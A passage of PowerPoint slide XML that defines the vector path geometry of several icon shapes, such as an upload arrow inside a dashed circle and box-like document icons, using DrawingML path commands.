                  <a:pt x="1369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5546" y="2435"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5048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2" y="2756"/>
                  <a:pt x="5546" y="2435"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="1105" y="15642"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1403" y="16235"/>
                  <a:pt x="1759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5" y="15642"/>
                  <a:pt x="1105" y="15642"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1265" y="8133"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="359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6"/>
                  <a:pt x="1101" y="8714"/>
                  <a:pt x="1265" y="8133"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="943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3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2" name="Shape 2722"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3013903" y="4482539"/>
            <a:ext cx="278206" cy="2787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61"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10802" y="21600"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11469" y="21598"/>
                  <a:pt x="12137" y="21536"/>
                  <a:pt x="12788" y="21415"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="12615" y="20491"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12020" y="20603"/>
                  <a:pt x="11409" y="20660"/>
                  <a:pt x="10800" y="20661"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="14365" y="19991"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14707" y="20866"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15328" y="20625"/>
                  <a:pt x="15928" y="20324"/>
                  <a:pt x="16492" y="19973"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15994" y="19176"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15479" y="19497"/>
                  <a:pt x="14932" y="19771"/>
                  <a:pt x="14365" y="19991"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="11293" y="16211"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11293" y="6576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14395" y="9672"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14484" y="9761"/>
                  <a:pt x="14607" y="9816"/>
                  <a:pt x="14743" y="9816"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15016" y="9816"/>
                  <a:pt x="15236" y="9596"/>
                  <a:pt x="15236" y="9324"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15236" y="9189"/>
                  <a:pt x="15181" y="9065"/>
                  <a:pt x="15092" y="8976"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11149" y="5041"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11059" y="4952"/>
                  <a:pt x="10936" y="4897"/>
                  <a:pt x="10800" y="4897"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10664" y="4897"/>
                  <a:pt x="10541" y="4952"/>
                  <a:pt x="10452" y="5041"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6509" y="8976"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6419" y="9065"/>
                  <a:pt x="6364" y="9189"/>
                  <a:pt x="6364" y="9324"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6364" y="9596"/>
                  <a:pt x="6584" y="9816"/>
                  <a:pt x="6857" y="9816"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6993" y="9816"/>
                  <a:pt x="7116" y="9761"/>
                  <a:pt x="7206" y="9672"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10307" y="6576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10307" y="16211"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10307" y="16483"/>
                  <a:pt x="10528" y="16703"/>
                  <a:pt x="10800" y="16703"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11072" y="16703"/>
                  <a:pt x="11293" y="16483"/>
                  <a:pt x="11293" y="16211"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="17446" y="18078"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18081" y="18770"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18572" y="18323"/>
                  <a:pt x="19024" y="17827"/>
                  <a:pt x="19424" y="17297"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18673" y="16732"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18307" y="17216"/>
                  <a:pt x="17894" y="17669"/>
                  <a:pt x="17446" y="18078"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="21553" y="9794"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20617" y="9880"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20645" y="10182"/>
                  <a:pt x="20659" y="10492"/>
                  <a:pt x="20659" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20659" y="11099"/>
                  <a:pt x="20646" y="11401"/>
                  <a:pt x="20619" y="11699"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21556" y="11784"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21586" y="11458"/>
                  <a:pt x="21600" y="11127"/>
                  <a:pt x="21600" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="10462"/>
                  <a:pt x="21584" y="10124"/>
                  <a:pt x="21553" y="9794"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="18660" y="4853"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19412" y="4287"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19011" y="3759"/>
                  <a:pt x="18558" y="3264"/>
                  <a:pt x="18066" y="2816"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17432" y="3510"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17882" y="3919"/>
                  <a:pt x="18295" y="4371"/>
                  <a:pt x="18660" y="4853"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="6893" y="20882"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="7513" y="21121"/>
                  <a:pt x="8160" y="21302"/>
                  <a:pt x="8814" y="21422"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8984" y="20499"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8387" y="20389"/>
                  <a:pt x="7797" y="20223"/>
                  <a:pt x="7231" y="20006"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7231" y="20006"/>
                  <a:pt x="6893" y="20882"/>
                  <a:pt x="6893" y="20882"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="19632" y="15184"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20474" y="15602"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20770" y="15008"/>
                  <a:pt x="21013" y="14383"/>
                  <a:pt x="21194" y="13743"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20288" y="13487"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20123" y="14071"/>
                  <a:pt x="19902" y="14642"/>
                  <a:pt x="19632" y="15184"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="21187" y="7835"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="21005" y="7197"/>
                  <a:pt x="20761" y="6573"/>
                  <a:pt x="20464" y="5978"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="19622" y="6399"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19893" y="6941"/>
                  <a:pt x="20115" y="7510"/>
                  <a:pt x="20282" y="8094"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20282" y="8094"/>
                  <a:pt x="21187" y="7835"/>
                  <a:pt x="21187" y="7835"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="8923" y="1113"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8747" y="190"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8093" y="315"/>
                  <a:pt x="7448" y="501"/>
                  <a:pt x="6829" y="743"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7174" y="1617"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7737" y="1396"/>
                  <a:pt x="8326" y="1226"/>
                  <a:pt x="8923" y="1113"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="16474" y="1615"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="15907" y="1264"/>
                  <a:pt x="15307" y="966"/>
                  <a:pt x="14687" y="726"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="14346" y="1602"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14913" y="1821"/>
                  <a:pt x="15462" y="2094"/>
                  <a:pt x="15978" y="2413"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15978" y="2413"/>
                  <a:pt x="16474" y="1615"/>
                  <a:pt x="16474" y="1615"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2873" y="4886"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2120" y="4322"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1720" y="4853"/>
                  <a:pt x="1368" y="5424"/>
                  <a:pt x="1074" y="6018"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1917" y="6435"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2186" y="5892"/>
                  <a:pt x="2508" y="5371"/>
                  <a:pt x="2873" y="4886"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="3509" y="18800"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="4003" y="19247"/>
                  <a:pt x="4539" y="19650"/>
                  <a:pt x="5104" y="19997"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5598" y="19198"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5082" y="18881"/>
                  <a:pt x="4592" y="18513"/>
                  <a:pt x="4142" y="18105"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4142" y="18105"/>
                  <a:pt x="3509" y="18800"/>
                  <a:pt x="3509" y="18800"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12594" y="1105"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12765" y="182"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12116" y="61"/>
                  <a:pt x="11448" y="0"/>
                  <a:pt x="10788" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10787" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10736" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10779" y="940"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11389" y="940"/>
                  <a:pt x="12000" y="995"/>
                  <a:pt x="12594" y="1105"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="1104" y="15642"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1403" y="16235"/>
                  <a:pt x="1758" y="16804"/>
                  <a:pt x="2161" y="17332"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2910" y="16763"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2542" y="16281"/>
                  <a:pt x="2218" y="15762"/>
                  <a:pt x="1945" y="15220"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1945" y="15220"/>
                  <a:pt x="1104" y="15642"/>
                  <a:pt x="1104" y="15642"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5546" y="2435"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5047" y="1639"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4484" y="1991"/>
                  <a:pt x="3950" y="2397"/>
                  <a:pt x="3460" y="2846"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4096" y="3538"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4544" y="3127"/>
                  <a:pt x="5031" y="2756"/>
                  <a:pt x="5546" y="2435"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="1264" y="8133"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="358" y="7879"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="179" y="8516"/>
                  <a:pt x="59" y="9176"/>
                  <a:pt x="0" y="9838"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="938" y="9921"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="991" y="9317"/>
                  <a:pt x="1101" y="8714"/>
                  <a:pt x="1264" y="8133"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="942" y="11741"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6" y="11829"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="69" y="12492"/>
                  <a:pt x="194" y="13151"/>
                  <a:pt x="377" y="13786"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1281" y="13527"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1114" y="12946"/>
                  <a:pt x="1000" y="12346"/>
                  <a:pt x="942" y="11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3" name="Shape 2723"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3547164" y="448253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345" y="10309"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7899" y="10309"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7974" y="9863"/>
                  <a:pt x="8153" y="9453"/>
                  <a:pt x="8405" y="9099"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8717" y="9412"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8909" y="9604"/>
                  <a:pt x="9220" y="9604"/>
                  <a:pt x="9412" y="9412"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9603" y="9220"/>
                  <a:pt x="9603" y="8909"/>
                  <a:pt x="9412" y="8717"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9101" y="8407"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9454" y="8157"/>
                  <a:pt x="9864" y="7979"/>
                  <a:pt x="10309" y="7904"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10309" y="8345"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10309" y="8617"/>
                  <a:pt x="10529" y="8836"/>
                  <a:pt x="10800" y="8836"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11071" y="8836"/>
                  <a:pt x="11291" y="8617"/>
                  <a:pt x="11291" y="8345"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11291" y="7904"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11737" y="7979"/>
                  <a:pt x="12146" y="8157"/>
                  <a:pt x="12499" y="8407"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="12188" y="8717"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11997" y="8909"/>
                  <a:pt x="11997" y="9220"/>
                  <a:pt x="12188" y="9412"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12380" y="9604"/>
                  <a:pt x="12691" y="9604"/>
                  <a:pt x="12883" y="9412"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="13195" y="9099"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13447" y="9453"/>
                  <a:pt x="13626" y="9863"/>
                  <a:pt x="13701" y="10309"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="13255" y="10309"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12983" y="10309"/>
                  <a:pt x="12764" y="10529"/>
                  <a:pt x="12764" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12764" y="11071"/>
                  <a:pt x="12983" y="11291"/>
                  <a:pt x="13255" y="11291"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="13701" y="11291"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13626" y="11738"/>
                  <a:pt x="13447" y="12147"/>
                  <a:pt x="13195" y="12501"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="12883" y="12188"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12691" y="11997"/>
                  <a:pt x="12380" y="11997"/>
                  <a:pt x="12188" y="12188"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11997" y="12380"/>
                  <a:pt x="11997" y="12691"/>
                  <a:pt x="12188" y="12883"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="12499" y="13193"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12146" y="13444"/>
                  <a:pt x="11737" y="13621"/>
                  <a:pt x="11291" y="13696"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11291" y="13255"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11291" y="12983"/>
                  <a:pt x="11071" y="12764"/>
                  <a:pt x="10800" y="12764"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10529" y="12764"/>
                  <a:pt x="10309" y="12983"/>
                  <a:pt x="10309" y="13255"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10309" y="13696"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9864" y="13621"/>
                  <a:pt x="9454" y="13444"/>
                  <a:pt x="9101" y="13193"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9412" y="12883"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9603" y="12691"/>
                  <a:pt x="9603" y="12380"/>
                  <a:pt x="9412" y="12188"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9220" y="11997"/>
                  <a:pt x="8909" y="11997"/>
                  <a:pt x="8717" y="12188"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8405" y="12501"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8153" y="12147"/>
                  <a:pt x="7974" y="11738"/>
                  <a:pt x="7899" y="11291"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8345" y="11291"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8617" y="11291"/>
                  <a:pt x="8836" y="11071"/>
                  <a:pt x="8836" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8836" y="10529"/>
                  <a:pt x="8617" y="10309"/>
                  <a:pt x="8345" y="10309"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="8023" y="13577"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8023" y="13578"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8734" y="14288"/>
                  <a:pt x="9716" y="14727"/>
                  <a:pt x="10800" y="14727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11884" y="14727"/>
                  <a:pt x="12866" y="14288"/>
                  <a:pt x="13577" y="13578"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="13577" y="13577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13577" y="13577"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14288" y="12866"/>
                  <a:pt x="14727" y="11884"/>
                  <a:pt x="14727" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14727" y="8631"/>
                  <a:pt x="12969" y="6873"/>
                  <a:pt x="10800" y="6873"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8631" y="6873"/>
                  <a:pt x="6873" y="8631"/>
                  <a:pt x="6873" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6873" y="11884"/>
                  <a:pt x="7311" y="12866"/>
                  <a:pt x="8023" y="13577"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8023" y="13577"/>
                  <a:pt x="8023" y="13577"/>
                  <a:pt x="8023" y="13577"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="10800" y="11782"/>
                </a:move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moveTo>
                  <a:pt x="17673" y="5891"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="17131" y="5891"/>
                  <a:pt x="16691" y="6331"/>
                  <a:pt x="16691" y="6873"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="16691" y="7855"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16691" y="8396"/>
                  <a:pt x="17131" y="8836"/>
                  <a:pt x="17673" y="8836"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17673" y="12764"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17131" y="12764"/>
                  <a:pt x="16691" y="13204"/>
                  <a:pt x="16691" y="13745"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="16691" y="14727"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16691" y="15270"/>
                  <a:pt x="17131" y="15709"/>
                  <a:pt x="17673" y="15709"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17673" y="17673"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3927" y="17673"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3927" y="3927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17673" y="3927"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17673" y="3927"/>
                  <a:pt x="17673" y="5891"/>
                  <a:pt x="17673" y="5891"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="18655" y="5891"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18655" y="2945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2945" y="2945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2945" y="18655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18655" y="18655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18655" y="15709"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19196" y="15709"/>
                  <a:pt x="19636" y="15270"/>
                  <a:pt x="19636" y="14727"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="19636" y="13745"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19636" y="13204"/>
                  <a:pt x="19196" y="12764"/>
                  <a:pt x="18655" y="12764"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18655" y="8836"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19196" y="8836"/>
                  <a:pt x="19636" y="8396"/>
                  <a:pt x="19636" y="7855"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="19636" y="6873"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19636" y="6331"/>
                  <a:pt x="19196" y="5891"/>
                  <a:pt x="18655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4" name="Shape 2724"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4080425" y="448253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1782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15709" y="11782"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15709" y="11782"/>
                  <a:pt x="15709" y="15709"/>
                  <a:pt x="15709" y="15709"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="16691" y="10800"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4909" y="10800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0800"/>
                  <a:pt x="16691" y="10800"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="11782" y="13745"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9818" y="13745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9818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1782" y="5891"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9818" y="5891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9818" y="6873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11782" y="6873"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11782" y="6873"/>
                  <a:pt x="11782" y="5891"/>
                  <a:pt x="11782" y="5891"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="15709" y="7855"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5891" y="7855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7855"/>
                  <a:pt x="15709" y="7855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8836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16691" y="8836"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16691" y="8836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5" name="Shape 2725"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4613686" y="448253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7673"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="18655" y="18214"/>
                  <a:pt x="18214" y="18655"/>
                  <a:pt x="17673" y="18655"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3927" y="18655"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3385" y="18655"/>
                  <a:pt x="2945" y="18214"/>
                  <a:pt x="2945" y="17673"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2945" y="982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18655" y="982"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18655" y="982"/>
                  <a:pt x="18655" y="17673"/>
                  <a:pt x="18655" y="17673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lnTo>
                  <a:pt x="1964" y="982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1964" y="17673"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1964" y="18757"/>
                  <a:pt x="2843" y="19636"/>
                  <a:pt x="3927" y="19636"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4909" y="19636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4909" y="21109"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4909" y="21380"/>
                  <a:pt x="5129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9636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15709" y="19636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lnTo>
                  <a:pt x="16691" y="19636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17673" y="19636"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18757" y="19636"/>
                  <a:pt x="19636" y="18757"/>
                  <a:pt x="19636" y="17673"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="19636" y="982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21109" y="982"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21380" y="982"/>
                  <a:pt x="21600" y="762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moveTo>
                  <a:pt x="15709" y="10800"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11782" y="10800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11782" y="9818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9818" y="9818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9818" y="10800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5891" y="10800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5891" y="8836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15709" y="8836"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15709" y="8836"/>
                  <a:pt x="15709" y="10800"/>
                  <a:pt x="15709" y="10800"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="16691" y="7855"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4909" y="7855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4909" y="11782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16691" y="11782"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16691" y="11782"/>
                  <a:pt x="16691" y="7855"/>
                  <a:pt x="16691" y="7855"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="15709" y="15709"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11782" y="15709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11782" y="14727"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9818" y="14727"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9818" y="15709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5891" y="15709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5891" y="13745"/>
                </a:lnTo>
                <a:lnTo>
